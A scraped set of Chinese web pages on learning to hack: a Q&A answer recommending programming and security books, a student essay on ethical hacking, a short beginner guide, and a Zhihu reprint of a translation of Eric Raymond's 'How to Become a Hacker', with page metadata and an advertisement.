我想学习黑客知识，该如何入门
我想学习黑客知识，该如何入门
09-12-27 &匿名提问
具体说一下，掌握的技术 1.熟练掌握 C语言，汇编语言 基本上黑客新手都要学到disassemble（反汇编），就是通过一个程序运行的汇编套路来分析其源代码。并用c语言进行测试。汇编要掌握到（stack，protected mode，data segment，ESP，EBP...）,C语言（bit-field, stdcall...） 2.计算机原理 分析程序数据没有十进制，只有2进制和16进制（就是或0xFF...），要懂得基本运算。还有big/little-endian等基本术语，会用WinHex/UltraEdit或VS的dempbin分析程序。 3.网络：TCP/IP（TCP，UDP，ICMP，DNS，IP等许多协议），会截取数据包，还有分析frame，结合telnet/ftp/c语言的socket等命令进行网络打劫！这部分最难最枯燥，建议看understanding TCP/IP这本书 4.系统的认知！了解Windows内部API，sockets编程，IP proxy（IPv6最好也学），真正的黑客是几乎漏不出马脚的！ 这些就是基础，然后熟练掌握各种操作流程，可以强行进行telnet，或进行TCP hijack，或夺取远程sid等。。。还有很多要学，根本数不完。推荐你看一下几本书（我看过许多书，走过弯路，这是整理后的最优选择） 1.Assembly language step-by-step 掌握汇编语言，和CPU运行机制，内存模式等 2.the C programming language C语言的灵魂制作 3.（C++可以了解一下）C++ from ground up或C++ premier C++在底层其实代替不了C 4.Understanding TCP/IP TCP/IP网络的精髓，最黑客的前提！ 这些都是技术，接下来再看专门的黑客辅导书 1.No Scrach.Hacking the art of exploiting 太经典了，C+汇编+TCP/IP 叫你很多黑客方法 2.Hacking assembly 详解程序反汇编，跟汇编关系很大，3.Hacking Exposed 一些黑客实例，巩固一下实力。
请登录后再发表评论!我想当“黑客”700字作文_散文吧作文网欢迎光临，希望您在本站找到满意的作文！ &
& 我想当“黑客”700字作文我想当“黑客”我的理想是当一“黑客”，一名行侠仗义、除暴安良、维护网络安全的“黑客”。
看到“黑客”一词，很多人都会咬牙切齿，恨之入骨。我要说，其实，大家完全扭曲了“黑客”的含义。
水能载舟，亦能覆舟。黑客技术也是如此，它本身是没有好与坏之分的，只是因为人的心灵有了善与恶的念头，才使得它有了好与坏的区别。有的人将黑客技术用于保护自己，反击敌人，维护网络世界的安全，所以，他们是网络中的侠客，是正义的化身。而有的人将黑客技术用于欺负弱小，非法牟利，破坏网络的安定，所以，他们是网络中的恶魔，是邪恶的化身。在“侠”与“魔”之间，我当然要选择做一名维护网络世界安全的侠客。
现在,网络世界的天空布满了阴霾。有的人在网上传播不良信息，有的人利用网络传播病毒与木马，还有的人在网上盗取他人的密码窃取钱财……一个个为了欲望而迷失在网络之中。我的电脑也曾经遭受过病毒的攻击，病毒充斥着整个电脑，使电脑的速度慢如蜗牛。这些破坏网络安全的人，仿佛拥有隐身术一样，能够在不知不觉中潜入别人电脑上的家，肆无忌惮地窥视别人的隐私，窃取别人的财产。对这种人，我是深恶痛绝的。可是，大多数网民在遭受病毒攻击时，只能束手无策。当我想到网民们的痛苦，想到网民们的利益，我就决心要捍卫网络的和平。我决心成为一名除暴安良的电脑“黑客”，伸张正义，替天行道。
但是，要想成为一名“黑客”并不像想像中那样容易。“黑客”，是一种神圣的称呼，要有高超的技术，还要有行侠仗义、除暴安良的正确观念。我目前缺少的就是高超的技术。所以我要从现在开始做起，搞好学习，为将来学习更深奥的计算机知识打下坚实的基础，用勤奋与汗水为理想插上飞翔的翅膀。分享到：相关作文:我的理想是当一“黑客”，一名行侠仗义、除暴安良、维护网络安全的“黑客”。看到“黑客”一词，很多人都会咬牙切齿，恨之入骨。我...但是，要想成为一名“黑客”并不像想像中那样容易。...黑客：当然，没听到人家叫我“黑客”吗？小白：…哦，我还以为那是因为你张得很黑…...这、不太好吧，为什么要见小白：我想看看你是不是和我想的一样黑客：呵，你想的什么样？...小白：“我的电脑”里面没有啊黑客：算了，当我什么也没做过黑客：我已经控制了你的电脑小白：哦黑客：害怕了吧？嘿嘿小白：...黑客：当然，没听到人家叫我“黑客”吗？...首先，我要做一个对国家人民有益的工程师，坚决除掉黑客。其次，要做一个慈善家，在...我想帮助他们建立救助站，可是没有权利…所以，从现在起，我就要发奋学习，长大以后当一个比尔&...看着看着这上面的作文忽然自己想写一篇作文(游戏)嘻嘻,本人写作是不怎么样,但是写游戏的话,我写多少都行....第2步:就当在第一句以前吧,最最最基本的,吃饭都要在电脑上边玩边吃,甚至写作业的...不会是黑客程序或者特洛伊木马之类的病毒程序吧？还是不要打开的好，万一是病毒，把我这台花了老爸老妈整整半年工资的奔腾5代电脑毁了怎么办？我用鼠标将邮件点亮，正要把...我想临阵脱逃。...当你亲眼看见的时候我会让你目瞪口呆。对于他俩的玩法我不便于多说，想了解来电1应天F联系。慢慢了解了这个游戏，才知道是刚公测。而且在10月21号的时候还...（我想老玩家都知道这个BUG吧？...当你想吃饭时，模拟空间可以用最快的速度送上一桌饭菜，在这间房子里，什么都有，供你学习的电脑，还有电视机,健身器…。...可是—在半夜里，“黑客老鼠”打破了我的“诺贝尔奖”梦，我一气之...作文网今日排行编辑推荐美文最新发布的作文黑客知识人人爱 想要学会黑客技术只需三步!
　　一、探索基础知识　　在你开始学习黑客知识之前，你应该花一些时间在网上搜索一些黑客相关的信息，比如：&黑客的意义是什么?&、&谁是黑客&、&黑客的类型有哪些?&、 &黑客的道义和责任是什么?&等等问题，这将有助于你了解黑客并未你之后的学习打下基础。　　二、找到一个好的起点来开始学习　　对于新人来说最难的问题是找到一个好的起点来开始学习，尽管现在有很多书籍和其他资料来教你如何攻击别人。但这些教材的通病就是它们需要读者有一定的知识基础来理解他们的内容。对于新手来说，这些东西并不适用。在此，笔者推荐一本书，《黑客大曝光》（Hacking Secrets Exposed）。这本书的内容非常浅显易懂，无论之前有没有基础，都可以读懂这本书。此外这本书涵盖的内容十分广泛，从基础、进阶到顶端循序渐进，简单而有效。通过这本书你可以学到所有黑客的秘密知识，并且将它们应用到实际中。　　三、学习编程知识　　作为一个优秀的黑客，编程知识是你需要掌握的。虽然有些黑客甚至一点编程知识也不懂，但是学会一些程序语言对你来说还是大有裨益的，比如C、HTML、PHP、JavsScript等等。如果你并不确定你是否需要编程知识，那么在你学完道义的黑客知识后再来学习编程技术也为时不晚。成为一名黑客需要多长时间？　　这一问题确实很难回答，在前面我交代过，我们很难一夜间成为一个黑客大师。一名爱好者想要成为一名真正的黑客，需要拥有，知识、技巧、创造力、决心和系统的学习。这些都很难用具体的时间来衡量，武侠小说中的习武者尚且分资质，更何况现实中的学习。因此如果你想成为一名黑客，长久学习的热情、牢固的基础、&好的学习方法、资料都是必不可少的。
键盘也能翻页，试试“← →”键
网络设备论坛帖子排行
最新资讯离线随时看
聊天吐槽赢奖品如何成为一名黑客 - 知乎专栏
你正在使用一个过时的浏览器。请以查看此页面。
{"debug":false,"apiRoot":"","paySDK":"/api/js","name":"production","instance":"column","tokens":{"X-XSRF-TOKEN":null,"X-UDID":null,"Authorization":"oauth c3cef7c66aa9e6a1e3160e20"}}
{"database":{"Post":{"":{"title":"如何成为一名黑客","author":"zhang-peng-87-6-42","content":"写在前面的话：虽然很多人都知道这篇文章，但是我相信还是有一部分人没有见到它，即便是你读过它，可我相信时不时找出来读一下还是会有不一样的想法，它就像是那口“奉天成仁”的箱子，时不时提醒你该加点兵器进去了.什么是黑客？Jargon File 包含了一大堆关于“hacker”这个词的定义，大部分与技术高超和热衷解决问题 及超越极限有关。但如果你只想知道如何 成为 一名黑客， 那么只有两件事情确实相关。这可以追溯到几十年前第一台分时小型电脑诞生, ARPAnet 实验也刚展开的 年代，那时有一个由程序设计专家和网络名人所组成的, 具有分享特点的文化社群。 这种文化的成员创造了 “hacker” 这个名词。黑客们建立了 Internet。 黑客们发明出了现在使用的 UNIX 操作系统。黑客们使 Usenet 运作起来， 黑客们让 WWW 运转起来。如果你是这个文化的一部分，如果你对这种文化有所贡献，而且 这个社群的其它成员也认识你并称你为 hacker, 那么你就是一位黑客。黑客精神并不仅仅局限在软件的黑客文化中。 有人用黑客态度对待其它事情，如电子学和音乐—— 事实上，你可以在任何最高级别的科学和艺术活动中发现它。 精于软件的黑客赞赏这些在其他领域的同类并把他们也称作黑客—— 有人宣称黑客天性是绝对独立于他们工作的特定领域的。 但在这份文档中， 我们将注意力集中在软件黑客的技术和态度， 以及发明了“黑客”一词的以共享为特征的文化传统之上。有一群人大声嚷嚷着自己是黑客，但他们不是。 他们（主要是正值青春的少年）是一些蓄意破坏计算机和电话系统的人。 真正的黑客把这些人叫做“骇客”(cracker)，并不屑与之为伍。 多数真正的黑客认为骇客们又懒又不负责任，还没什么大本事。 专门以破坏别人安全为目的的行为并不能使你成为一名黑客， 正如 用铁丝偷开走汽车并不能使你成为一个汽车工程师。 不幸的是，很多记者和作家往往错把“骇客”当成黑客； 这种做法一直使真正的黑客感到恼火。根本的区别是：黑客搞建设，骇客搞破坏。如果你想成为一名黑客，请接着读下去。如果你想做一个骇客，去读
新闻组，并在意识到你并不像自己想象的那么聪明后去坐五到十次监狱。 关于骇客，我只想说这么多。黑客应有的态度黑客们解决问题，建设事物，同时他们崇尚自由和无私的双向帮助。 要被他人承认是一名黑客，你的行为得体现出你好像具备了这种态度一般。 而要想做得好象你具备这种态度一般，你就得切切实实坚持它。但是如果你认为培养黑客态度只是一条在黑客文化圈中得到承认的路子， 那就大错特错了。成为具备这些特质的这种人对 你自己非常重要——有助于你学习，及给你提供源源不断的动力。 同所有创造性的艺术一样，成为大师的最有效方法就是模仿大师的精神—— 不仅从智力上，也要从感情上进行模仿。或许, 下面这首现代的禅诗很好的阐述了这个意思：
To follow the path:（沿着这样一条道路：）
look to the master,（寻找大师，）
follow the master,（跟随大师，）
walk with the master,（与大师通行，）
see through the master,（洞察大师，）
become the master.（成为大师。）嗯，如果你想成为一名黑客，反复读下面的事情直至你相信它们：1.世界上充满了待解决的迷人问题.做一名黑客会有很多乐趣，但却是要费很多气力方能得到的乐趣。 这些努力需要动力。成功的运动员从锻炼身体、超越自我极限的愉悦中得到动力。 同样，做黑客，你得能从解决问题，磨练技术及锻炼智力中得到基本的乐趣。如果你还不是天生的这类人又想做黑客，你就要设法成为这样的人。 否则你会发现，你的黑客热情会被其他分心的事物吞噬掉——如金钱、性和社会上的虚名。（同样你必须对你自己的学习能力建立信心——相信尽管当你对某问题近乎一无所知， 但只要你一点一点地试验、学习，最终会掌握并解决它。）2. 一个问题不应该被解决两次。聪明的脑袋是宝贵的有限的资源。当世界还充满非常多有待解决的有趣的新问题时， 它们不应该被浪费在重新发明轮子这类事情上。作为一名黑客，你必须相信其他黑客的思考时间是宝贵的——因此共享信息， 解决问题并发布结果给其他黑客几乎是一种道义，这样其他人就可以去解决 新问题而不是不断地忙于对付旧问题。(你不必认为一定要把你 所有的发明创造公布出去， 但这样做的黑客是赢得大家极度尊敬的人。卖些钱来养家糊口，租房买计算机 甚至发大财和黑客价值观也是相容的，只要你别忘记你还是个黑客。)3. 无聊和乏味的工作是罪恶。黑客（泛指具有创造力的人们）应该从来不会被愚蠢的重复性劳动所困扰， 因为当这种事情发生时就意味着他们没有在做只有他们才能做的事情—— 解决新问题。这样的浪费伤害每一个人。因此，无聊和乏味的工作不仅仅是 令人不舒服而已，而且是罪恶。作为一个黑客，你必须坚信这点并尽可能多地将乏味的工作自动化， 不仅为你自己，也为了其他人（尤其是其他黑客们）。(对此有一个明显的例外。黑客有时也做一些在他人看来是重复性或枯燥的工作 以进行“脑力休息”，或是为了获得某种技能，或是获得一些除此以外无法获得的 特别经验。但这是自愿的——有脑子的人不应该被迫做无聊的活儿。）4. 自由万岁。黑客们是天生的反独裁主义者。 任何能向你发命令的人能够迫使你停止解决令你着迷的问题， 同时，按照独裁者的一般思路，他通常会给出一些极端愚昧的理由。 因此，不论何处，任何独裁主义的作法，只要它压迫你和其他黑客，你就要和它斗到底。(这并非向所有权威挑战。儿童需要监护，罪犯要被看管起来。 如果服从命令得到某种东西比起用其他方式得到它更节约时间，黑客可以同意 接受某种形式的权威。但这是一个有限度的，有意的交易； 那种权威想要的个人服从不是你应该同意给予的。)权威喜欢审查和保密。他们不信任自愿的合作和信息的共享—— 他们只喜欢由他们控制的所谓“合作”。因此，作为一个黑客， 你得对审查、保密，以及使用武力或欺骗去压迫有行为能力的人们的做法有一种本能的敌意。 同时你要有为此信念斗争的意愿。5. 态度不能替代能力。作为一名黑客，你必须培养起这些态度。 但只具备这些态度并不能使你成为一名黑客，也不能使你成为一个运动健将和摇滚明星。 成为一名黑客需要智力，实践，奉献精神和辛苦工作。因此，你必须学会怀疑，并尊重各种各样的能力。 黑客们不会为那些装模做样的人浪费时间，但他们却非常尊重能力—— 尤其是从事黑客工作的能力，不过任何能力总归是好的。 具备很少人能具备的那些方面的能力尤其好，其中具备 涉及脑力、技巧和专注方面能力的当然最好。尊敬能力，你就会享受到提高自己能力的乐趣—— 辛苦的工作和奉献会变成一种高度娱乐而非苦差事。 要想成为一名黑客，这一点非常重要。黑客的基本技能黑客态度重要，但技术更加重要。 态度无法替代技术，在你被别的黑客称为黑客之前，有一些基本的技术你必须掌握。这些基本技术随着新技术的出现和老技术的过时也随时间在缓慢改变。 例如，过去内容包括使用机器语言编程，而直到最近才包括了HTML。 总的来说现在主要包括以下技术：1. 学习如何编程。这当然是最基本的黑客技能。如果你还不会任何编程语言，我建议你从Python开始。 它设计清晰，文档齐全，合适初学者入门。 它是一门很好的入门语言，并且不仅仅只是个玩具； 它非常强大、灵活，也适合做大型项目。 我有一篇 Python评价详细说明这点。好的 教程 可以在Python网站得到。 （译者：比较好的中文Python站点可能是。）Java也是好的入门语言。它比Python难得多，但是生成的代码速度也快得多。 它同时也是一种优秀的计算机语言，不止是用来入门。但是注意，如果你只会一两门语言，你将不会达到黑客所要求的技术水平， 甚至也不能达到一个程序员的水平——你需要学会如何以抽象的方式思考编程问题， 独立于任何语言。要做一名真正的黑客，你需要学会在几天内通过一些手册， 结合你现在所知，迅速掌握一门新语言。这意味着你应该学会几种截然不同的语言。如果要做一些重要的编程工作，你将不得不学习C语言，Unix的核心语言。 C++与C非常其他类似；如果你了解其中一种，学习另一种应该不难。 但这两种都不适合编程入门者学习。而且事实上，你越避免用C编程，你的工作效率会越高。C非常有效率，节约你的机器资源。不幸的是，C的高效是通过你手动做很多底层的管理 （如内存）来达到的。底层代码都是复杂极易出现bug的，会使你花极多的时间调试。 如今的机器速度如此之快，这通常是得不偿失——比较明智的做法是使用一种运行较慢、较低 效率，但大幅节省你的时间的语言。因此，选择Python。其他对黑客而言比较重要的语言包括 Perl和 LISP。 Perl实用，值得一学；它被广泛用于动态网页和系统管理， 因此即便你从不用Perl写程序，至少也应该学会看。许多人使用Perl的理由和 我建议你使用Python的理由一样，都是为了避免用C完成那些不需要C高效率的工作。 你会需要理解那些工作的代码的。LISP值得学习的理由不同——最终掌握了它时你会得到丰富的启迪和经验。 这些经验会使你在以后的日子里成为一个更好的程序员，即使你实际上很少使用LISP本身。当然，实际上你最好五种都会（Python，Java，C/C++，Perl和LISP）。 除了是最重要的黑客语言外，它们还代表了截然不同的编程思路和方法，每种都会让你受益非浅。这里我无法给你完完全全的指导教会你如何编程——这是个复杂的技能。 但我可以告诉你，书本和上课也不能作到（最好的黑客中，有许多，也许 几乎都是自学成材的）。 你可以从书本上学到语言的特点——只是一些皮毛， 但要使书面知识成为自身技能只能通过实践和虚心向他人学习。 因此要作到 （一）读代码及（二）写代码。学习如何编程就象学习用优美的自然语言写作一样。 最好的做法是读一些大师的名著，试着自己写点东西，再读些，再写点，再读些，再写点…… 如此往复，直到你的文章达到你体会到的范文的简洁和力量。过去找到适合阅读的好的代码是困难的，因为几乎没有大型程序的源代码能让新手练手。 这种状况已经戏剧性地发生变化；开放源代码软件，编程工具和操作系统（全都由黑客写成）现在已经 随处可见。让我们在下一个话题中继续讨论……2. 得到一个开放源代码的Unix并学会使用、运行它。我假设你已经拥有或者能使用一台个人电脑（今天的孩子们真幸福 :-) ）。新手们能够朝学习黑客技能迈出的最基本的一步就是得到 一份Linux或BSD-Unix的一种，安装在个人电脑上，并运行它。没错，这世界上除了Unix还有其他操作系统。 但它们都是以二进制形式发布的——你无法读到它的源代码，也不可能修改它。 尝试在运行DOS或Windows或MacOS的机器上学习黑客技术，就象是带着脚镣学跳舞。除此之外，Unix还是Internet的操作系统。 你可以学会上网却不知道Unix，但你不了解Unix就无法成为一名Internet黑客。 因此，今天的黑客文化在很大程度上是以Unix为中心的。（这点并不总是真的， 一些很早的黑客对此一直很不高兴，但Unix和Internet之间的联系已是如此之强， 甚至连Microsoft也无可奈何。）所以, 安装一套UNIX——我个人喜爱LINUX但还有其他种类的 （是的，你可以同时安装Linux及DOS/Windows在同一电脑上)。 学习它，使用它，配置它。用它在Internet上冲浪。阅读它的源代码。修改它的源代码。 你会得到比在Microsoft操作系统上更好的编程工具（包括C，LISP，Python及Perl）。 你会觉得乐趣无穷，学到在你成为大师之前意识不到的更多的知识。想知道更多关于学习Unix的信息，访问 The Loginataka。想知道如何得到一份Linux，访问 。 （译者：对于中文读者来讲，最简单的方式未过于前往附近的D版/正版光盘店。）你可以在 找到BSD Unix的求助及其他资源。我有写一篇关于 的入门文章。（注：如果你是一个新手，我不推荐自己独立安装Linux或者BSD。 安装Linux的话，寻求本地Linux用户组的帮助；或联系 。 LISC维护着一些 ， 在那里你可以获得帮助。）3. 学会如何使用WWW和写HTML黑客文化建造的大多东西都在你看不见的地方发挥着作用，帮助工厂、办公室和大学正常运转， 表面上很难看到它对非黑客的普通人的生活的影响。Web是一个大大的例外。 即便政客也同意，这个巨大耀眼的黑客玩具正在改变整个世界。 单是这个原因（还有许多其它的），你就需要学习掌握Web。这并不是仅仅意味着如何使用浏览器（谁都会），而是要学会如何写HTML， Web的标记语言。如果你不会编程，写HTML会教你一些有助于学习的思考习惯。 因此，先完成一个主页。（网上有很多好的教程； 。)但仅仅拥有一个主页不能使你成为一名黑客。 Web里充满了各种网页。大多数是毫无意义的，零信息量垃圾——界面时髦的垃圾， 注意，垃圾的水准都类似（更多信息访问 ）。要想有价值，你的网页必须有内容—— 它必须有趣或对其它黑客有帮助。这是下一个话题所涉及的……4. 如果你不懂实用性的英语，学习吧。作为一个美国人和一个以英语为母语的人，我以前很不情愿提到这点，免得成为 一种文化上的帝国主义。但相当多以其他语言为母语的人一直劝我指出这一点，那就是 英语是黑客文化和Internet的工作语言，你需要懂得以便在黑客社区顺利工作。这一点千真万确。大概1991年的时候我就了解到许多黑客在技术讨论中使用英语，甚至当他们的母语都 相同，英语对他们而言只是第二语言的时候；据我知道的报导，当前英语有着比其他语言丰富得多的技术词汇， 因此是一个对于工作来说相当好的工具。 基于类似的原因，英文技术书籍的翻译通常不令人满意（如果有翻译的话）。Linus Torvalds，一个芬兰人，用英语注释他的代码（很明显这对他来说不是凑巧）。 他流利的英语成为他能够管理全球范围的Linux开发人员社区的重要因素。 这是一个值得学习的例子。黑客文化中的地位象大部分不涉及金钱的文化一样，黑客王国靠声誉运转。 你设法解决有趣的问题，但它们到底多有趣，你的解法有多好， 是要由那些和你具有同样技术水平的人或比你更厉害的人去评判的。相应地，当你在玩黑客游戏时，你得认识到你的分数主要靠其他黑客对你的技术的评价给出 （这就是为什么只有在其它黑客称你为黑客时，你才算得上是一名黑客）。 这个事实常会被黑客是一项孤独的工作这一印象所减弱；也会被另一个黑客文化的禁忌所减弱 （现在逐渐减弱但仍强大）：拒绝承认自我或外部评估与一个人的动力有关系。特别地，黑客王国被人类学家们称为一种奉献文化。 在这里你不是凭借你对别人的统治来建立地位和名望，也不是靠美貌，或拥有其他人想要的东西， 而是靠你的奉献。尤其是奉献你的时间，你的创造和你的技术成果。要获得其他黑客的尊敬，基本上有五种事情你可以干：1. 写开放源代码软件第一个（也是最集中的和传统的）是写些被其他黑客认为有趣或有用的程序， 并把程序源代码提供给整个黑客文化使用。（过去我们称之为“free software （自由软件）”， 但这却使很多不知 free 的精确含义的人感到困惑。 现在我们很多人，根据搜索引擎网页内容分析至少有2：1的比率，使用“ ”software（开放源代码软件）这个词）。黑客王国里最受尊敬的偶像是那些写了大型的、好用的、具有广泛用途的软件， 并把它们公布出去，使得每人都在使用他软件的人。2. 帮助测试并调试开放源代码软件黑客也尊敬那些使用、测试开放源代码软件的人。 在这个并非完美的世界上，我们不可避免地要花大多数的开发时间在调试阶段。 这就是为什么任何有头脑的开放源代码的作者都会告诉你好的beta测试员 （知道如何清楚描述出错症状，很好地定位错误，能忍受快速发布中的bug， 并且愿意使用一些简单的诊断工具）象红宝石一样珍贵。 甚至他们中的一个能判断出哪个测试阶段是延长的， 哪个是令人精疲力尽的噩梦，哪个只是一个有益的小麻烦。如果你是个新手，试着找一个你感兴趣的正在开发的程序，做一个好的beta测试员。 你会自然地从帮着测试，进步到帮着抓臭虫，到最后帮着改程序。 你会从中学到很多，并且与未来会帮你的人结下友谊。3. 公布有用的信息另一个好事是收集整理有用有趣的信息做成网页或文档如FAQ列表，且让他们容易获得。主要技术FAQ的维护者受到几乎同其他开放源代码的作者一样多的尊敬。4. 帮助维护基础设施的运转黑客文化（还有Internet的工程方面的发展，就此而言）是靠自愿者运转的。 要使Internet能正常工作，就要有大量枯燥的工作不得不去完成——管理mail list，新闻组，维护大型软件库，开发RFC和其它技术标准等等。做这类事情的人会得到很多尊敬，因为每人都知道这些事情是十分花时间又不象编程那样好玩。 做这些事情需要奉献精神。5. 为黑客文化本身服务最后，你可以为这个文化本身做宣传（例如，象我这样，写一个“如何成为黑客”的正面的教程 :-) ） （译者：不知道Barret把它翻成中文算不算？）。 这并非一定要在你已经在这个圈子呆了很久，因以上四点中的某点而出名，有一定声誉后才能去做。黑客文化没有领袖。精确地说，它确实有些文化英雄、部落长者、历史学家和发言人。 若你在这圈内呆的够长，你或许成为其中之一。 记住：黑客们不相信他们的部落长者的自夸的炫耀， 因此大举追求这种名誉是危险的。与其奋力追求，不如先摆正自己的位置 等它自己到你的手中——那时则要做到谦虚和优雅。黑客和书呆子(Nerd)的联系同流行的迷思相反，做一名黑客并不一定要你是个书呆子。 但它确实有帮助，而且许多黑客事实上是书呆子。 做一个深居简出的人有助于你集中精力进行十分重要的事情，如思考和编程。因此，很多黑客都愿意接受“书呆子”这个外号， 更有甚者使用更尖刻的“geek（怪人）”一词并引以为豪—— 这是一种宣布他们独立于主流社会的声明方式。访问
参加更多的讨论。如果你能集中足够的精力做好黑客工作同时还能有正常的生活，这很好。 现在作到这一点比我在1970年代是新手的时候要容易的多； 如今主流文化对技术怪人要友善的多。 甚至有越来越多的人意识到黑客通常是很好的恋人和配偶的材料。如果你因为生活上不如意而迷上做黑客，那也没什么——至少你不会分神了。 或许以后你会找到自己的另一半。风格的意义重申一下，作为一名黑客，你必须进入黑客精神之中。 当你不在计算机边上时，你仍然有很多对黑客工作有帮助的事情可做。 它们并不能替代真正的编程（没有什么能），但很多黑客都那么做， 并感到它们与黑客的本质存在某些基本的连系。学会流畅地用母语写作。尽管程序员不能写好文章的错误看法相当普遍， 但是有令人惊讶数目的黑客（包括所有我知道的最棒的）都是不错的作家。阅读科幻小说。参加科幻小说讨论会。（一个碰到黑客和未来会成为黑客的人的好方法）学禅，并且/或者练功习武。（精神修炼看来是惊人相似。）练就能分析音乐的听觉，学会鉴赏特别的音乐。学会玩某种乐器，或唱歌。提高对双关语、文字游戏的鉴赏能力。这些事情，你已经做的越多，你就越是天生做黑客的材料。 至于为什么偏偏是这些事情，原因并不完全清楚， 但它们都涉及用到左－右脑能力的综合，这似乎是关键所在 （黑客们既需要清晰的逻辑思维，有时又需要偏离逻辑跳出问题的表象）。最后，还有一些不要去做的事情。不要使用愚蠢的，哗众取宠的ID或昵称。不要卷入Usenet（或其他地方的论坛）的骂战。不要自称为“cyberpunk（网络叛客）”，也不要浪费时间和那些人打交道。不要让你寄出的Email或张贴的帖子充满错误的拼写和乱七八糟的语法。做以上的事情，只会招来嘲笑。黑客们个个记忆超群—— 你将需要数年的时间让他们忘记你犯下的错误。网名的问题值得深思。将身份隐藏在虚假的名字后是骇客、解密者、d00dz 及其他低等生物幼稚愚蠢的行为特点。黑客不会做这些事； 他们对他们所作的感到骄傲，而且乐于人们将作品与他们的 真名相联系。 因此, 若你现在用假名，放弃它。在黑客文化里它会令你你失败的。原文作者：Eric Raymond—————————————————————————————————————————放个广告，老司机乘车点几年前读了《黑客与画家》这本书，我是一名涂鸦插画师，也是一名白帽子黑客。“杰出、优秀、正直、有底线的优秀人才，比如Hackers，他们不服从管教，不愿意委身于社会大环境的潮水之中而无法辨别方向。然而，很自负的人必须培养出敏锐的感觉，及时发现周围形式的变化，知道如何脱身。”——Paul Graham 《黑客与画家》我想通过此次live和大家聊聊如何系统的学习插画与涂鸦，零基础选手怎样入门插画和涂鸦，以及具有黑客精神的程序员如何从画画中吸收灵感。点击这里上车 →_→","updated":"T14:19:20.000Z","canComment":false,"commentPermission":"anyone","commentCount":43,"collapsedCount":0,"likeCount":454,"state":"published","isLiked":false,"slug":"","isTitleImageFullScreen":true,"rating":"none","titleImage":"/v2-e14eefdc643f_r.jpg","links":{"comments":"/api/posts//comments"},"reviewers":[],"topics":[{"url":"/topic/","id":"","name":"黑客 (Hacker)"},{"url":"/topic/","id":"","name":"网络安全"},{"url":"/topic/","id":"","name":"互联网"}],"titleImageSize":{"width":1600,"height":900},"href":"/api/posts/","excerptTitle":"","column":{"slug":"c_","name":"白帽笔记"},"tipjarState":"inactivated","sourceUrl":"","pageCommentsCount":43,"snapshotUrl":"","publishedTime":"T22:19:20+08:00","url":"/p/","lastestLikers":[{"profileUrl":"/people/gui-qi-wu-qi","bio":"数学本科生，计算机爱好者","hash":"f17b24cece9cf12ee57c731","uid":123400,"isOrg":false,"description":"","isOrgWhiteList":false,"slug":"gui-qi-wu-qi","avatar":{"id":"b271fd36ea61","template":"/{id}_{size}.jpg"},"name":"无期"},{"profileUrl":"/people/zxzxz-19","bio":null,"hash":"e9ed5dce533b745ce2a3b","uid":355200,"isOrg":false,"description":"","isOrgWhiteList":false,"slug":"zxzxz-19","avatar":{"id":"da8e974dc","template":"/{id}_{size}.jpg"},"name":"zxzxz"},{"profileUrl":"/people/an-an-22-11","bio":"","hash":"93f794bb0918643fda8791cff5280573","uid":24,"isOrg":false,"description":"","isOrgWhiteList":false,"slug":"an-an-22-11","avatar":{"id":"da8e974dc","template":"/{id}_{size}.jpg"},"name":"安安"},{"profileUrl":"/people/luo-shan-58","bio":"从历史中看人世，从真相中看人心。","hash":"eb","uid":467300,"isOrg":false,"description":"死宅，经常点赞，看了不少，却比以前更迷茫。","isOrgWhiteList":false,"slug":"luo-shan-58","avatar":{"id":"a2abf2ee51e55d889b391c","template":"/{id}_{size}.jpg"},"name":"陆离"},{"profileUrl":"/people/mao-mao-83-46","bio":"不断学习，获得新生。数据分析小白、营养学","hash":"b4afc87ef0c96baeddf72","uid":975000,"isOrg":false,"description":"","isOrgWhiteList":false,"slug":"mao-mao-83-46","avatar":{"id":"v2-a1cd120f6dc0aa","template":"/{id}_{size}.jpg"},"name":"猫猫"}],"summary":"写在前面的话：虽然很多人都知道这篇文章，但是我相信还是有一部分人没有见到它，即便是你读过它，可我相信时不时找出来读一下还是会有不一样的想法，它就像是那口“奉天成仁”的箱子，时不时提醒你该加点兵器进去了.什么是黑客？Jargon File 包含了一大堆…","reviewingCommentsCount":0,"meta":{"previous":{"isTitleImageFullScreen":false,"rating":"none","titleImage":"/v2-0b7a409c1ad43fb81ca9893_r.jpg","links":{"comments":"/api/posts//comments"},"topics":[{"url":"/topic/","id":"","name":"艺术"},{"url":"/topic/","id":"","name":"设计"},{"url":"/topic/","id":"","name":"黑客 (Hacker)"}],"href":"/api/posts/","excerptTitle":"","author":{"profileUrl":"/people/zhang-peng-87-6-42","bio":"侠","hash":"097caab061c6ade54fa086a","uid":68,"isOrg":false,"description":"听说《源泉》是一本能甄别soulmate的书\n微博：迦持涂鸦","isOrgWhiteList":false,"slug":"zhang-peng-87-6-42","avatar":{"id":"v2-ad45b2e50d8fff9a1fdecb","template":"/{id}_{size}.jpg"},"name":"小鸟"},"column":{"slug":"c_","name":"白帽笔记"},"content":"几年前读了《黑客与画家》这本书，我是一名涂鸦插画师，也是一名白帽子黑客。“杰出、优秀、正直、有底线的优秀人才，比如Hackers，他们不服从管教，不愿意委身于社会大环境的潮水之中而无法辨别方向。然而，很自负的人必须培养出敏锐的感觉，及时发现周围形式的变化，知道如何脱身。”——Paul Graham 《黑客与画家》我想通过此次live和大家聊聊如何系统的学习插画与涂鸦，零基础选手怎样入门插画和涂鸦，以及具有黑客精神的程序员如何从画画中吸收灵感。点击这里上车 →_→live简介：我是小鸟，一名职业涂鸦插画师，从未接受过正式的绘画训练，在大约十年的画画生涯中，画过上千幅商业涂鸦和插画，五年前我和朋友创办了迦持涂鸦工作室。参与设计 TCL 环保主题屏保系列插画，参加克拉玛依国际涂鸦交流赛。在所在城市的大街小巷都有我留下的涂鸦作品，并且我也是一名极限运动爱好者，持续练习滑板，跑酷，单板滑雪，极限轮滑有五年以上经验。 \n本次 Live 